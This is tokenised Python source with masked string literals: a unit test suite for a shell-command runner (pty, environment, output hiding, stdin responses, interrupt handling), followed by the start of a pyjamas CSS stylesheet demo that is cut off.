pty , True ) <EOL> def kwarg_beats_config ( self ) : <EOL> runner = self . _runner ( run = { '<STR_LIT>' : False } ) <EOL> eq_ ( runner . run ( _ , pty = True ) . pty , True ) <EOL> class shell : <EOL> def defaults_to_bash_when_pty_True ( self ) : <EOL> eq_ ( self . _run ( _ , pty = True ) . shell , '<STR_LIT>' ) <EOL> def defaults_to_bash_when_pty_False ( self ) : <EOL> eq_ ( self . _run ( _ , pty = False ) . shell , '<STR_LIT>' ) <EOL> def may_be_overridden ( self ) : <EOL> eq_ ( self . _run ( _ , shell = '<STR_LIT>' ) . shell , '<STR_LIT>' ) <EOL> def may_be_configured ( self ) : <EOL> runner = self . _runner ( run = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> eq_ ( runner . run ( _ ) . shell , '<STR_LIT>' ) <EOL> def kwarg_beats_config ( self ) : <EOL> runner = self . _runner ( run = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> eq_ ( runner . run ( _ , shell = '<STR_LIT>' ) . shell , '<STR_LIT>' ) <EOL> class env : <EOL> def defaults_to_os_environ ( self ) : <EOL> eq_ ( self . _run ( _ ) . env , os . environ ) <EOL> def updates_when_dict_given ( self ) : <EOL> expected = dict ( os . environ , FOO = '<STR_LIT>' ) <EOL> eq_ ( self . _run ( _ , env = { '<STR_LIT>' : '<STR_LIT>' } ) . env , expected ) <EOL> def replaces_when_replace_env_True ( self ) : <EOL> eq_ ( <EOL> self . _run ( _ , env = { '<STR_LIT>' : '<STR_LIT>' } , replace_env = True ) . env , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> def config_can_be_used ( self ) : <EOL> eq_ ( <EOL> self . _run ( _ , settings = { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } } ) . env , <EOL> dict ( os . environ , FOO = '<STR_LIT>' ) , <EOL> ) <EOL> def kwarg_wins_over_config ( self ) : <EOL> settings = { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } } <EOL> kwarg = { '<STR_LIT>' : '<STR_LIT>' } <EOL> eq_ ( <EOL> self . _run ( _ , settings = settings , env = kwarg ) . 
env [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' <EOL> ) <EOL> class return_value : <EOL> def return_code_in_result ( self ) : <EOL> """<STR_LIT>""" <EOL> runner = self . _runner ( exits = <NUM_LIT> ) <EOL> r = runner . run ( _ , warn = True ) <EOL> eq_ ( r . return_code , <NUM_LIT> ) <EOL> eq_ ( r . exited , <NUM_LIT> ) <EOL> def ok_attr_indicates_success ( self ) : <EOL> runner = self . _runner ( ) <EOL> eq_ ( runner . run ( _ ) . ok , True ) <EOL> def ok_attr_indicates_failure ( self ) : <EOL> runner = self . _runner ( exits = <NUM_LIT:1> ) <EOL> eq_ ( runner . run ( _ , warn = True ) . ok , False ) <EOL> def failed_attr_indicates_success ( self ) : <EOL> runner = self . _runner ( ) <EOL> eq_ ( runner . run ( _ ) . failed , False ) <EOL> def failed_attr_indicates_failure ( self ) : <EOL> runner = self . _runner ( exits = <NUM_LIT:1> ) <EOL> eq_ ( runner . run ( _ , warn = True ) . failed , True ) <EOL> @ trap <EOL> def stdout_attribute_contains_stdout ( self ) : <EOL> runner = self . _runner ( out = '<STR_LIT:foo>' ) <EOL> eq_ ( runner . run ( _ ) . stdout , "<STR_LIT:foo>" ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT:foo>" ) <EOL> @ trap <EOL> def stderr_attribute_contains_stderr ( self ) : <EOL> runner = self . _runner ( err = '<STR_LIT:foo>' ) <EOL> eq_ ( runner . run ( _ ) . stderr , "<STR_LIT:foo>" ) <EOL> eq_ ( sys . stderr . getvalue ( ) , "<STR_LIT:foo>" ) <EOL> def whether_pty_was_used ( self ) : <EOL> eq_ ( self . _run ( _ ) . pty , False ) <EOL> eq_ ( self . _run ( _ , pty = True ) . pty , True ) <EOL> def command_executed ( self ) : <EOL> eq_ ( self . _run ( _ ) . command , _ ) <EOL> def shell_used ( self ) : <EOL> eq_ ( self . _run ( _ ) . shell , '<STR_LIT>' ) <EOL> class command_echoing : <EOL> @ trap <EOL> def off_by_default ( self ) : <EOL> self . _run ( "<STR_LIT>" ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def enabled_via_kwarg ( self ) : <EOL> self . 
_run ( "<STR_LIT>" , echo = True ) <EOL> assert_contains ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def enabled_via_config ( self ) : <EOL> self . _run ( "<STR_LIT>" , settings = { '<STR_LIT>' : { '<STR_LIT>' : True } } ) <EOL> assert_contains ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def kwarg_beats_config ( self ) : <EOL> self . _run ( "<STR_LIT>" , echo = True , settings = { '<STR_LIT>' : { '<STR_LIT>' : False } } ) <EOL> assert_contains ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def uses_ansi_bold ( self ) : <EOL> self . _run ( "<STR_LIT>" , echo = True ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> class encoding : <EOL> def defaults_to_encoding_method_result ( self ) : <EOL> runner = self . _runner ( ) <EOL> encoding = '<STR_LIT>' <EOL> runner . default_encoding = Mock ( return_value = encoding ) <EOL> with patch ( '<STR_LIT>' ) as codecs : <EOL> runner . run ( _ ) <EOL> runner . default_encoding . assert_called_with ( ) <EOL> _expect_encoding ( codecs , encoding ) <EOL> def honors_config ( self ) : <EOL> with patch ( '<STR_LIT>' ) as codecs : <EOL> c = Context ( Config ( overrides = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) ) <EOL> _Dummy ( c ) . run ( _ ) <EOL> _expect_encoding ( codecs , '<STR_LIT>' ) <EOL> def honors_kwarg ( self ) : <EOL> skip ( ) <EOL> class output_hiding : <EOL> @ trap <EOL> def _expect_hidden ( self , hide , expect_out = "<STR_LIT>" , expect_err = "<STR_LIT>" ) : <EOL> self . _runner ( out = '<STR_LIT:foo>' , err = '<STR_LIT:bar>' ) . run ( _ , hide = hide ) <EOL> eq_ ( sys . stdout . getvalue ( ) , expect_out ) <EOL> eq_ ( sys . stderr . getvalue ( ) , expect_err ) <EOL> def both_hides_everything ( self ) : <EOL> self . _expect_hidden ( '<STR_LIT>' ) <EOL> def True_hides_everything ( self ) : <EOL> self . _expect_hidden ( True ) <EOL> def out_only_hides_stdout ( self ) : <EOL> self . 
_expect_hidden ( '<STR_LIT>' , expect_out = "<STR_LIT>" , expect_err = "<STR_LIT:bar>" ) <EOL> def err_only_hides_stderr ( self ) : <EOL> self . _expect_hidden ( '<STR_LIT>' , expect_out = "<STR_LIT:foo>" , expect_err = "<STR_LIT>" ) <EOL> def accepts_stdout_alias_for_out ( self ) : <EOL> self . _expect_hidden ( '<STR_LIT>' , expect_out = "<STR_LIT>" , expect_err = "<STR_LIT:bar>" ) <EOL> def accepts_stderr_alias_for_err ( self ) : <EOL> self . _expect_hidden ( '<STR_LIT>' , expect_out = "<STR_LIT:foo>" , expect_err = "<STR_LIT>" ) <EOL> def None_hides_nothing ( self ) : <EOL> self . _expect_hidden ( None , expect_out = "<STR_LIT:foo>" , expect_err = "<STR_LIT:bar>" ) <EOL> def False_hides_nothing ( self ) : <EOL> self . _expect_hidden ( False , expect_out = "<STR_LIT:foo>" , expect_err = "<STR_LIT:bar>" ) <EOL> @ raises ( ValueError ) <EOL> def unknown_vals_raises_ValueError ( self ) : <EOL> self . _run ( _ , hide = "<STR_LIT>" ) <EOL> def unknown_vals_mention_value_given_in_error ( self ) : <EOL> value = "<STR_LIT>" <EOL> try : <EOL> self . _run ( _ , hide = value ) <EOL> except ValueError as e : <EOL> msg = "<STR_LIT>" <EOL> msg += "<STR_LIT>" . format ( e ) <EOL> ok_ ( value in str ( e ) , msg ) <EOL> else : <EOL> assert False , "<STR_LIT>" <EOL> def does_not_affect_capturing ( self ) : <EOL> eq_ ( self . _runner ( out = '<STR_LIT:foo>' ) . run ( _ , hide = True ) . stdout , '<STR_LIT:foo>' ) <EOL> @ trap <EOL> def overrides_echoing ( self ) : <EOL> self . _runner ( ) . run ( '<STR_LIT>' , hide = True , echo = True ) <EOL> assert_not_contains ( sys . stdout . getvalue ( ) , '<STR_LIT>' ) <EOL> class output_stream_overrides : <EOL> @ trap <EOL> def out_defaults_to_sys_stdout ( self ) : <EOL> "<STR_LIT>" <EOL> self . _runner ( out = "<STR_LIT>" ) . run ( _ ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def err_defaults_to_sys_stderr ( self ) : <EOL> "<STR_LIT>" <EOL> self . _runner ( err = "<STR_LIT>" ) . run ( _ ) <EOL> eq_ ( sys . 
stderr . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def out_can_be_overridden ( self ) : <EOL> "<STR_LIT>" <EOL> out = StringIO ( ) <EOL> self . _runner ( out = "<STR_LIT>" ) . run ( _ , out_stream = out ) <EOL> eq_ ( out . getvalue ( ) , "<STR_LIT>" ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def err_can_be_overridden ( self ) : <EOL> "<STR_LIT>" <EOL> err = StringIO ( ) <EOL> self . _runner ( err = "<STR_LIT>" ) . run ( _ , err_stream = err ) <EOL> eq_ ( err . getvalue ( ) , "<STR_LIT>" ) <EOL> eq_ ( sys . stderr . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def pty_defaults_to_sys ( self ) : <EOL> self . _runner ( out = "<STR_LIT>" ) . run ( _ , pty = True ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> @ trap <EOL> def pty_out_can_be_overridden ( self ) : <EOL> out = StringIO ( ) <EOL> self . _runner ( out = "<STR_LIT>" ) . run ( _ , pty = True , out_stream = out ) <EOL> eq_ ( out . getvalue ( ) , "<STR_LIT>" ) <EOL> eq_ ( sys . stdout . getvalue ( ) , "<STR_LIT>" ) <EOL> class output_stream_handling : <EOL> def writes_and_flushes_to_stdout ( self ) : <EOL> out = Mock ( spec = StringIO ) <EOL> self . _runner ( out = "<STR_LIT>" ) . run ( _ , out_stream = out ) <EOL> out . write . assert_called_once_with ( "<STR_LIT>" ) <EOL> out . flush . assert_called_once_with ( ) <EOL> def writes_and_flushes_to_stderr ( self ) : <EOL> err = Mock ( spec = StringIO ) <EOL> self . _runner ( err = "<STR_LIT>" ) . run ( _ , err_stream = err ) <EOL> err . write . assert_called_once_with ( "<STR_LIT>" ) <EOL> err . flush . assert_called_once_with ( ) <EOL> class input_stream_handling : <EOL> @ patch ( '<STR_LIT>' , StringIO ( "<STR_LIT>" ) ) <EOL> def defaults_to_sys_stdin ( self ) : <EOL> klass = self . _mock_stdin_writer ( ) <EOL> self . _runner ( klass = klass ) . run ( _ , out_stream = StringIO ( ) ) <EOL> calls = list ( map ( lambda x : call ( b ( x ) ) , "<STR_LIT>" ) ) <EOL> klass . write_stdin . 
assert_has_calls ( calls , any_order = False ) <EOL> def can_be_overridden ( self ) : <EOL> klass = self . _mock_stdin_writer ( ) <EOL> in_stream = StringIO ( "<STR_LIT>" ) <EOL> self . _runner ( klass = klass ) . run ( <EOL> _ , <EOL> in_stream = in_stream , <EOL> out_stream = StringIO ( ) , <EOL> ) <EOL> calls = list ( map ( lambda x : call ( b ( x ) ) , "<STR_LIT>" ) ) <EOL> klass . write_stdin . assert_has_calls ( calls , any_order = False ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def exceptions_get_logged ( self , mock_debug ) : <EOL> klass = self . _mock_stdin_writer ( ) <EOL> klass . write_stdin . side_effect = OhNoz ( "<STR_LIT>" ) <EOL> try : <EOL> stdin = StringIO ( "<STR_LIT>" ) <EOL> self . _runner ( klass = klass ) . run ( _ , in_stream = stdin ) <EOL> except ThreadException : <EOL> pass <EOL> mock_debug . assert_called_with ( "<STR_LIT>" ) <EOL> class failure_handling : <EOL> @ raises ( Failure ) <EOL> def fast_failures ( self ) : <EOL> self . _runner ( exits = <NUM_LIT:1> ) . run ( _ ) <EOL> def non_one_return_codes_still_act_as_failure ( self ) : <EOL> r = self . _runner ( exits = <NUM_LIT> ) . run ( _ , warn = True ) <EOL> eq_ ( r . failed , True ) <EOL> def Failure_repr_includes_stderr ( self ) : <EOL> try : <EOL> self . _runner ( exits = <NUM_LIT:1> , err = "<STR_LIT>" ) . run ( _ , hide = True ) <EOL> assert false <EOL> except Failure as f : <EOL> r = repr ( f ) <EOL> err = "<STR_LIT>" . format ( r ) <EOL> assert '<STR_LIT>' in r , err <EOL> def Failure_repr_should_present_stdout_when_pty_was_used ( self ) : <EOL> try : <EOL> self . _runner ( exits = <NUM_LIT:1> , out = "<STR_LIT>" ) . run ( _ , hide = True , pty = True ) <EOL> assert false <EOL> except Failure as f : <EOL> r = repr ( f ) <EOL> err = "<STR_LIT>" . 
format ( r ) <EOL> assert '<STR_LIT>' in r , err <EOL> class threading : <EOL> def errors_within_io_thread_body_bubble_up ( self ) : <EOL> class Oops ( _Dummy ) : <EOL> def handle_stdout ( self , ** kwargs ) : <EOL> raise OhNoz ( ) <EOL> def handle_stderr ( self , ** kwargs ) : <EOL> raise OhNoz ( ) <EOL> runner = Oops ( Context ( ) ) <EOL> try : <EOL> runner . run ( "<STR_LIT>" ) <EOL> except ThreadException as e : <EOL> eq_ ( len ( e . exceptions ) , <NUM_LIT:2> ) <EOL> for tup in e . exceptions : <EOL> ok_ ( isinstance ( tup . value , OhNoz ) ) <EOL> ok_ ( isinstance ( tup . traceback , types . TracebackType ) ) <EOL> eq_ ( tup . type , OhNoz ) <EOL> else : <EOL> assert False , "<STR_LIT>" <EOL> class responding : <EOL> def nothing_is_written_to_stdin_by_default ( self ) : <EOL> klass = self . _mock_stdin_writer ( ) <EOL> self . _runner ( klass = klass ) . run ( _ ) <EOL> ok_ ( not klass . write_stdin . called ) <EOL> def _expect_response ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> klass = self . _mock_stdin_writer ( ) <EOL> kwargs [ '<STR_LIT>' ] = klass <EOL> runner = self . _runner ( ** kwargs ) <EOL> runner . run ( _ , responses = kwargs [ '<STR_LIT>' ] , hide = True ) <EOL> return klass . write_stdin <EOL> def string_keys_in_responses_kwarg_yield_values_as_stdin_writes ( self ) : <EOL> self . _expect_response ( <EOL> out = "<STR_LIT>" , <EOL> responses = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ) . assert_called_once_with ( b ( "<STR_LIT>" ) ) <EOL> def regex_keys_also_work ( self ) : <EOL> self . _expect_response ( <EOL> out = "<STR_LIT>" , <EOL> responses = { r'<STR_LIT>' : '<STR_LIT>' } , <EOL> ) . assert_called_once_with ( b ( '<STR_LIT>' ) ) <EOL> def multiple_hits_yields_multiple_responses ( self ) : <EOL> holla = call ( b ( '<STR_LIT>' ) ) <EOL> self . _expect_response ( <EOL> out = "<STR_LIT>" , <EOL> responses = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ) . 
assert_has_calls ( [ holla , holla ] ) <EOL> def chunk_sizes_smaller_than_patterns_still_work_ok ( self ) : <EOL> klass = self . _mock_stdin_writer ( ) <EOL> klass . read_chunk_size = <NUM_LIT:1> <EOL> responses = { '<STR_LIT>' : '<STR_LIT>' } <EOL> runner = self . _runner ( klass = klass , out = "<STR_LIT>" ) <EOL> runner . run ( _ , responses = responses , hide = True ) <EOL> holla = call ( b ( '<STR_LIT>' ) ) <EOL> klass . write_stdin . assert_has_calls ( [ holla , holla ] ) <EOL> eq_ ( len ( klass . write_stdin . call_args_list ) , <NUM_LIT:2> ) <EOL> def patterns_span_multiple_lines ( self ) : <EOL> output = """<STR_LIT>""" <EOL> self . _expect_response ( <EOL> out = output , <EOL> responses = { r'<STR_LIT>' : '<STR_LIT>' } , <EOL> ) . assert_called_once_with ( b ( '<STR_LIT>' ) ) <EOL> def both_out_and_err_are_scanned ( self ) : <EOL> bye = call ( b ( "<STR_LIT>" ) ) <EOL> self . _expect_response ( <EOL> out = "<STR_LIT>" , <EOL> err = "<STR_LIT>" , <EOL> responses = { "<STR_LIT:hello>" : "<STR_LIT>" } , <EOL> ) . assert_has_calls ( [ bye , bye ] ) <EOL> def multiple_patterns_works_as_expected ( self ) : <EOL> calls = [ call ( b ( '<STR_LIT>' ) ) , call ( b ( '<STR_LIT>' ) ) ] <EOL> self . _expect_response ( <EOL> out = "<STR_LIT>" , <EOL> responses = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> ) . assert_has_calls ( calls , any_order = True ) <EOL> def multiple_patterns_across_both_streams ( self ) : <EOL> responses = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> calls = map ( lambda x : call ( b ( x ) ) , responses . values ( ) ) <EOL> self . _expect_response ( <EOL> out = "<STR_LIT>" , <EOL> err = "<STR_LIT>" , <EOL> responses = responses , <EOL> ) . assert_has_calls ( calls , any_order = True ) <EOL> class io_sleeping : <EOL> def input_sleep_attribute_defaults_to_hundredth_of_second ( self ) : <EOL> eq_ ( Runner ( Context ( ) ) . 
input_sleep , <NUM_LIT> ) <EOL> @ mock_subprocess ( ) <EOL> def subclasses_can_override_input_sleep ( self ) : <EOL> class MyRunner ( _Dummy ) : <EOL> input_sleep = <NUM_LIT> <EOL> with patch ( '<STR_LIT>' ) as mock_time : <EOL> MyRunner ( Context ( ) ) . run ( <EOL> _ , <EOL> in_stream = StringIO ( "<STR_LIT:foo>" ) , <EOL> out_stream = StringIO ( ) , <EOL> ) <EOL> eq_ ( mock_time . sleep . call_args_list , [ call ( <NUM_LIT> ) ] * <NUM_LIT:3> ) <EOL> class stdin_mirroring : <EOL> def _test_mirroring ( <EOL> self , <EOL> expect_mirroring , <EOL> ** kwargs <EOL> ) : <EOL> fake_in = "<STR_LIT>" <EOL> output = Mock ( ) <EOL> input_ = StringIO ( fake_in ) <EOL> input_is_pty = kwargs . pop ( '<STR_LIT>' , None ) <EOL> class MyRunner ( _Dummy ) : <EOL> def echo_stdin ( self , input_ , output ) : <EOL> if input_is_pty is not None : <EOL> input_ . isatty = lambda : input_is_pty <EOL> return super ( MyRunner , self ) . echo_stdin ( input_ , output ) <EOL> self . _run ( <EOL> _ , <EOL> klass = MyRunner , <EOL> in_stream = input_ , <EOL> out_stream = output , <EOL> ** kwargs <EOL> ) <EOL> if expect_mirroring : <EOL> eq_ ( output . write . call_args_list , list ( map ( call , fake_in ) ) ) <EOL> eq_ ( len ( output . flush . call_args_list ) , len ( fake_in ) ) <EOL> else : <EOL> eq_ ( output . write . call_args_list , [ ] ) <EOL> def when_pty_is_True_no_mirroring_occurs ( self ) : <EOL> self . _test_mirroring ( <EOL> pty = True , <EOL> expect_mirroring = False , <EOL> ) <EOL> def when_pty_is_False_we_write_in_stream_back_to_out_stream ( self ) : <EOL> self . _test_mirroring ( <EOL> pty = False , <EOL> in_pty = True , <EOL> expect_mirroring = True , <EOL> ) <EOL> def mirroring_is_skipped_when_our_input_is_not_a_tty ( self ) : <EOL> self . _test_mirroring ( <EOL> in_pty = False , <EOL> expect_mirroring = False , <EOL> ) <EOL> def mirroring_can_be_forced_on ( self ) : <EOL> self . 
_test_mirroring ( <EOL> pty = True , <EOL> echo_stdin = True , <EOL> expect_mirroring = True , <EOL> ) <EOL> def mirroring_can_be_forced_off ( self ) : <EOL> self . _test_mirroring ( <EOL> pty = False , <EOL> in_pty = True , <EOL> echo_stdin = False , <EOL> expect_mirroring = False , <EOL> ) <EOL> def mirroring_honors_configuration ( self ) : <EOL> self . _test_mirroring ( <EOL> pty = False , <EOL> in_pty = True , <EOL> settings = { '<STR_LIT>' : { '<STR_LIT>' : False } } , <EOL> expect_mirroring = False , <EOL> ) <EOL> class character_buffered_stdin : <EOL> @ skip_if_windows <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def setcbreak_called_on_tty_stdins ( self , mock_termios , mock_tty ) : <EOL> self . _run ( _ ) <EOL> mock_tty . setcbreak . assert_called_with ( sys . stdin ) <EOL> @ skip_if_windows <EOL> @ patch ( '<STR_LIT>' ) <EOL> def setcbreak_not_called_on_non_tty_stdins ( self , mock_tty ) : <EOL> self . _run ( _ , in_stream = StringIO ( ) ) <EOL> eq_ ( mock_tty . setcbreak . call_args_list , [ ] ) <EOL> @ skip_if_windows <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def tty_stdins_have_settings_restored_by_default ( <EOL> self , mock_termios , mock_tty <EOL> ) : <EOL> sentinel = [ <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:3> , <NUM_LIT> ] <EOL> mock_termios . tcgetattr . return_value = sentinel <EOL> self . _run ( _ ) <EOL> mock_termios . tcsetattr . assert_called_once_with ( <EOL> sys . stdin , mock_termios . TCSADRAIN , sentinel <EOL> ) <EOL> @ skip_if_windows <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def tty_stdins_have_settings_restored_on_KeyboardInterrupt ( <EOL> self , mock_termios , mock_tty <EOL> ) : <EOL> sentinel = [ <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:3> , <NUM_LIT> ] <EOL> mock_termios . tcgetattr . return_value = sentinel <EOL> try : <EOL> self . _run ( _ , klass = _KeyboardInterruptingRunner ) <EOL> except KeyboardInterrupt : <EOL> pass <EOL> mock_termios . tcsetattr . 
assert_called_once_with ( <EOL> sys . stdin , mock_termios . TCSADRAIN , sentinel <EOL> ) <EOL> class keyboard_interrupts_act_transparently : <EOL> def _run_with_mocked_interrupt ( self , klass ) : <EOL> runner = klass ( Context ( config = Config ( ) ) ) <EOL> runner . send_interrupt = Mock ( ) <EOL> try : <EOL> runner . run ( _ ) <EOL> except : <EOL> pass <EOL> return runner <EOL> def send_interrupt_called_on_KeyboardInterrupt ( self ) : <EOL> runner = self . _run_with_mocked_interrupt ( <EOL> _KeyboardInterruptingRunner <EOL> ) <EOL> assert runner . send_interrupt . called <EOL> def send_interrupt_not_called_for_other_exceptions ( self ) : <EOL> class _GenericExceptingRunner ( _Dummy ) : <EOL> def wait ( self ) : <EOL> raise Exception <EOL> runner = self . _run_with_mocked_interrupt ( _GenericExceptingRunner ) <EOL> assert not runner . send_interrupt . called <EOL> def KeyboardInterrupt_is_still_raised ( self ) : <EOL> raised = None <EOL> try : <EOL> self . _run ( _ , klass = _KeyboardInterruptingRunner ) <EOL> except KeyboardInterrupt as e : <EOL> raised = e <EOL> assert raised is not None <EOL> class _FastLocal ( Local ) : <EOL> input_sleep = <NUM_LIT:0> <EOL> class _KeyboardInterruptingFastLocal ( _FastLocal ) : <EOL> def wait ( self ) : <EOL> raise KeyboardInterrupt <EOL> class Local_ ( Spec ) : <EOL> def _run ( self , * args , ** kwargs ) : <EOL> return _run ( * args , ** dict ( kwargs , klass = _FastLocal ) ) <EOL> def _runner ( self , * args , ** kwargs ) : <EOL> return _runner ( * args , ** dict ( kwargs , klass = _FastLocal ) ) <EOL> class pty_and_pty_fallback : <EOL> @ mock_pty ( ) <EOL> def when_pty_True_we_use_pty_fork_and_os_exec ( self ) : <EOL> "<STR_LIT>" <EOL> self . _run ( _ , pty = True ) <EOL> @ mock_pty ( ) <EOL> def pty_is_set_to_controlling_terminal_size ( self ) : <EOL> self . 
_run ( _ , pty = True ) <EOL> def warning_only_fires_once ( self ) : <EOL> skip ( ) <EOL> @ mock_pty ( isatty = False ) <EOL> def can_be_overridden_by_kwarg ( self ) : <EOL> self . _run ( _ , pty = True , fallback = False ) <EOL> @ mock_pty ( isatty = False ) <EOL> def can_be_overridden_by_config ( self ) : <EOL> self . _runner ( run = { '<STR_LIT>' : False } ) . run ( _ , pty = True ) <EOL> @ trap <EOL> @ mock_subprocess ( isatty = False ) <EOL> def fallback_affects_result_pty_value ( self , * mocks ) : <EOL> eq_ ( self . _run ( _ , pty = True ) . pty , False ) <EOL> @ mock_pty ( isatty = False ) <EOL> def overridden_fallback_affects_result_pty_value ( self ) : <EOL> eq_ ( self . _run ( _ , pty = True , fallback = False ) . pty , True ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def replaced_stdin_objects_dont_explode ( self , mock_sys ) : <EOL> mock_sys . stdin = object ( ) <EOL> runner = Local ( Context ( ) ) <EOL> eq_ ( runner . should_use_pty ( pty = True , fallback = True ) , False ) <EOL> @ mock_pty ( trailing_error = OSError ( "<STR_LIT>" ) ) <EOL> def spurious_OSErrors_handled_gracefully ( self ) : <EOL> self . _run ( _ , pty = True ) <EOL> @ mock_pty ( trailing_error = OSError ( "<STR_LIT>" ) ) <EOL> def non_spurious_OSErrors_bubble_up ( self ) : <EOL> try : <EOL> self . _run ( _ , pty = True ) <EOL> except ThreadException as e : <EOL> e = e . exceptions [ <NUM_LIT:0> ] <EOL> eq_ ( e . type , OSError ) <EOL> eq_ ( str ( e . value ) , "<STR_LIT>" ) <EOL> class encoding : <EOL> @ mock_subprocess ( ) <EOL> def uses_locale_module_for_desired_encoding ( self ) : <EOL> with patch ( '<STR_LIT>' ) as codecs : <EOL> self . _run ( _ ) <EOL> local_encoding = locale . getpreferredencoding ( False ) <EOL> _expect_encoding ( codecs , local_encoding ) <EOL> class send_interrupt : <EOL> def _run ( self , pty ) : <EOL> runner = _KeyboardInterruptingFastLocal ( Context ( config = Config ( ) ) ) <EOL> try : <EOL> runner . 
run ( _ , pty = pty ) <EOL> except KeyboardInterrupt : <EOL> pass <EOL> return runner <EOL> @ mock_pty ( skip_asserts = True ) <EOL> def uses_os_kill_when_pty_True ( self ) : <EOL> with patch ( '<STR_LIT>' ) as kill : <EOL> runner = self . _run ( pty = True ) <EOL> kill . assert_called_once_with ( runner . pid , SIGINT ) <EOL> @ mock_subprocess ( ) <EOL> def uses_subprocess_send_signal_when_pty_False ( self ) : <EOL> runner = self . _run ( pty = False ) <EOL> expected = SIGTERM if WINDOWS else SIGINT <EOL> runner . process . send_signal . assert_called_once_with ( expected ) <EOL> class shell : <EOL> @ mock_pty ( insert_os = True ) <EOL> def defaults_to_bash_when_pty_True ( self , mock_os ) : <EOL> self . _run ( _ , pty = True ) <EOL> eq_ ( mock_os . execve . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> @ mock_subprocess ( insert_Popen = True ) <EOL> def defaults_to_bash_when_pty_False ( self , mock_Popen ) : <EOL> self . _run ( _ , pty = False ) <EOL> eq_ ( mock_Popen . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> @ mock_pty ( insert_os = True ) <EOL> def may_be_overridden_when_pty_True ( self , mock_os ) : <EOL> self . _run ( _ , pty = True , shell = '<STR_LIT>' ) <EOL> eq_ ( mock_os . execve . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> @ mock_subprocess ( insert_Popen = True ) <EOL> def may_be_overridden_when_pty_False ( self , mock_Popen ) : <EOL> self . _run ( _ , pty = False , shell = '<STR_LIT>' ) <EOL> eq_ ( mock_Popen . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> class env : <EOL> @ mock_subprocess ( insert_Popen = True ) <EOL> def uses_Popen_kwarg_for_pty_False ( self , mock_Popen ) : <EOL> self . _run ( _ , pty = False , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> expected = dict ( os . environ , FOO = '<STR_LIT>' ) <EOL> eq_ ( <EOL> mock_Popen . 
call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , <EOL> expected <EOL> ) <EOL> @ mock_pty ( insert_os = True ) <EOL> def uses_execve_for_pty_True ( self , mock_os ) : <EOL> type ( mock_os ) . environ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . _run ( _ , pty = True , env = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> expected = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> eq_ ( <EOL> mock_os . execve . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] , <EOL> expected <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import pyjd <EOL> from pyjamas . ui . RootPanel import RootPanel <EOL> from pyjamas . ui . Button import Button <EOL> from pyjamas . ui . HTML import HTML <EOL> from pyjamas . ui . Label import Label <EOL> from pyjamas import Window <EOL> import pygwt <EOL> from __pyjamas__ import doc <EOL> from pyjamas import DOM <EOL> from pyjamas . ui . CSS import StyleSheetCssFile <EOL> from pyjamas . ui . CSS import StyleSheetCssText <EOL> newcolours = """<STR_LIT>""" <EOL> morenewcolours = """<STR_LIT>""" <EOL> global sc <EOL> sc = None <EOL> def greet ( fred ) : <EOL> global sc <EOL> txt = fred . getText ( ) <EOL> if txt == "<STR_LIT>" : <EOL> sc = StyleSheetCssText ( newcolours ) <EOL> fred . setText ( "<STR_LIT>" ) <EOL> elif txt == "<STR_LIT>" : <EOL> sc . remove ( ) <EOL> fred . setText ( "<STR_LIT>" ) <EOL> elif txt == "<STR_LIT>" : <EOL> sc = StyleSheetCssText ( morenewcolours 